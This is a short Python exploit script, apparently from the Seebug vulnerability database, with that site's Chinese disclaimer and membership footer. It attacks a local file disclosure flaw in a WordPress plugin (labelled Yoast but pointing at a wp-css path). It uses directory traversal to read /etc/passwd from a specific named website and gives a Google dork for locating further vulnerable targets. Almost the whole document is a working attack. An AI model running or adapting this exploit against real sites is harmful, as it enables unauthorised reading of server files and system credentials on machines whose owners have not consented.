#!/bin/python print "###########################################################################" print "# Exploit Title:WordPress Yoast v4.1.3 Local File Disclosure Vulnerability#" print "# Author:Angel Injection #" print "# Home Page: http://dev-point.com http://sec-krb.org #" print "# Exploit find By H7acker110 #" print "# python exploit find By Miroslav Stampar #" print "# Note:Iam Angel Injection From the country of civilizations(iraq) #" print "# Google Dork:inurl:wp-css-compress.php?f= #" print "###########################################################################" import urllib2 FILEPATH = "/etc/passwd" req = urllib2.urlopen("http://profitseo.com/wp-content/plugins/wp-css/wp-css-compress.php?f=../../../../../../../../../../%s" % FILEPATH) print "Filepath: '%s'" % FILEPATH print "Content: %s" % repr(req.read()) ############################# print "Exploit Completed" ############################# print "Inj3ct0r Team 4 ever" #############################
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论